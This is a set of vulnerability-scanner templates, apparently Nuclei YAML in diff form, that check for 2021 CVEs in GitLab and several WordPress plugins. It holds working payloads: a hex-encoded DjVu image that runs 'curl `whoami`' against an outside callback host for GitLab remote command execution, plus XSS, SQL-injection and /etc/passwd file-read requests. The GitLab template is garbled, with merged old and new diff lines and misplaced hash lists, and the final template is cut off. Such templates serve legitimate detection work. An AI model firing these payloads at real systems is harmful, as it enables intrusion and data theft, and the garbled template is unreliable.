description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
|
||||
reference:
|
||||
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator
|
||||
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196
|
||||
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
|
||||
- https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/
|
||||
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
|
||||
- https://hackerone.com/reports/1154542
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
|
||||
tags: cve,cve2021,gitlab,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 9.90
|
||||
cve-id: CVE-2021-22205
|
||||
cwe-id: CWE-20
|
||||
tags: cve,cve2021,gitlab,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /users/sign_in HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/users/sign_in"
|
||||
|
||||
- |
|
||||
POST /uploads/user HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
|
||||
X-CSRF-Token: {{csrf-token}}
|
||||
|
||||
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'Failed to process image'
|
||||
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 422
|
||||
- "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
|
||||
- "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
|
||||
- "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
|
||||
- "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
|
||||
- "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
|
||||
- "0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753"
|
||||
- "1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f"
|
||||
- "14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4"
|
||||
- "1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4"
|
||||
- "20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6"
|
||||
- "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
|
||||
- "292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369"
|
||||
- "2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae"
|
||||
- "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
|
||||
- "318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2"
|
||||
- "33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1"
|
||||
- "335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac"
|
||||
- "34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86"
|
||||
- "3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087"
|
||||
- "340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86"
|
||||
- "38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d"
|
||||
- "3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd"
|
||||
- "39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514"
|
||||
- "39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09"
|
||||
- "3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e"
|
||||
- "3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb"
|
||||
- "40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3"
|
||||
- "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
|
||||
- "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
|
||||
- "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
|
||||
- "4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b"
|
||||
- "45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44"
|
||||
- "473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117"
|
||||
- "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
|
||||
- "4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e"
|
||||
- "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
|
||||
- "504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb"
|
||||
- "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
|
||||
- "530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf"
|
||||
- "5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71"
|
||||
- "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
|
||||
- "64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a"
|
||||
- "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
|
||||
- "67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2"
|
||||
- "69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca"
|
||||
- "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
|
||||
- "70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b"
|
||||
- "7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5"
|
||||
- "73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d"
|
||||
- "77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f"
|
||||
- "78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab"
|
||||
- "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
|
||||
- "7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9"
|
||||
- "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
|
||||
- "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
|
||||
- "83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1"
|
||||
- "93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b"
|
||||
- "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
|
||||
- "9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b"
|
||||
- "9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e"
|
||||
- "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
|
||||
- "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
|
||||
- "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
|
||||
- "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
|
||||
- "aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b"
|
||||
- "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
|
||||
- "b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445"
|
||||
- "bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca"
|
||||
- "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
|
||||
- "bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7"
|
||||
- "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
|
||||
- "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
|
||||
- "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
|
||||
- "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
|
||||
- "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
|
||||
- "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
|
||||
- "d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c"
|
||||
- "d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f"
|
||||
- "dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56"
|
||||
- "def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3"
|
||||
- "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
|
||||
- "e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0"
|
||||
- "eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687"
|
||||
- "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
|
||||
- "ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd"
|
||||
- "ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83"
|
||||
- "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
|
||||
- "f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649"
|
||||
- "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
|
||||
condition: or
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf-token
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- 'csrf-token" content="(.*?)" />\n\n<meta'
|
||||
|
||||
- type: regex
|
||||
name: whoami
|
||||
part: interactsh_request
|
||||
group: 1
|
||||
regex:
|
||||
- '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'
|
||||
- '(?:application-)(\S{64})(?:\.css)'
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2021-24300
|
||||
|
||||
info:
|
||||
name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24300
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-24300
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
- |
|
||||
GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'value="\"onmouseover=alert(document.domain);//">'
|
||||
- "PickPlugins Product Slider"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2021-24488
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Post Grid < 2.1.8 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24488
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-24488
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'value="\"onmouseover=alert(document.domain)/">'
|
||||
- 'Post Grid'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-24510
|
||||
|
||||
info:
|
||||
name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS)
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24510
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-24510
|
||||
cwe-id: CWE-79
|
||||
tags: wordpress,cve,cve2021,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="></script><script>alert(document.domain)</script><" HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2021-24750
|
||||
|
||||
info:
|
||||
name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
|
||||
author: cckuakilong
|
||||
severity: high
|
||||
description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.
|
||||
reference:
|
||||
- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24750
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2021-24750
|
||||
cwe-id: CWE-89
|
||||
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "266f89556d2b38ff067b580fb305c522"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2021-24838
|
||||
|
||||
info:
|
||||
name: AnyComment <= 0.2.21 - Open Redirect
|
||||
author: noobexploiter
|
||||
severity: medium
|
||||
description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24838
|
||||
tags: wordpress,wp-plugin,open-redirect
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-24838
|
||||
cwe-id: CWE-601
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2021-24926
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Domain Check < 1.0.17 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24926
|
||||
classification:
|
||||
cve-id: CVE-2021-24926
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(document.domain)</script>"
|
||||
- "Domain Check"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2021-24947
|
||||
|
||||
info:
|
||||
name: RVM - Responsive Vector Maps < 6.4.2 - Arbitrary File Read
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: The plugin does not have proper authorisation, CSRF checks and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user, such as subscriber, to read arbitrary files on the web server.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24947
|
||||
classification:
|
||||
cve-id: CVE-2021-24947
|
||||
cwe-id: CWE-23
|
||||
tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated,lfr
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
- |
|
||||
GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2021-24991
|
||||
|
||||
info:
|
||||
name: The WooCommerce PDF Invoices & Packing Slips WordPress plugin < 2.10.5 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24991
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 4.8
|
||||
cve-id: CVE-2021-24991
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
|
||||
- "WooCommerce PDF Invoices"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2021-25008
|
||||
|
||||
info:
|
||||
name: The Code Snippets WordPress plugin < 2.14.3 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: The Code Snippets WordPress plugin before 2.14.3 does not escape the snippets-safe-mode parameter before outputting it back in attributes, leading to a Reflected Cross-Site Scripting issue.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25008
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-25008
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
|
||||
- "Snippets"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2021-25052
|
||||
|
||||
info:
|
||||
name: The Button Generator WordPress plugin < 2.3.3 - RFI
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25052
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2021-25052
|
||||
cwe-id: CWE-352
|
||||
tags: cve,cve2021,rfi,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
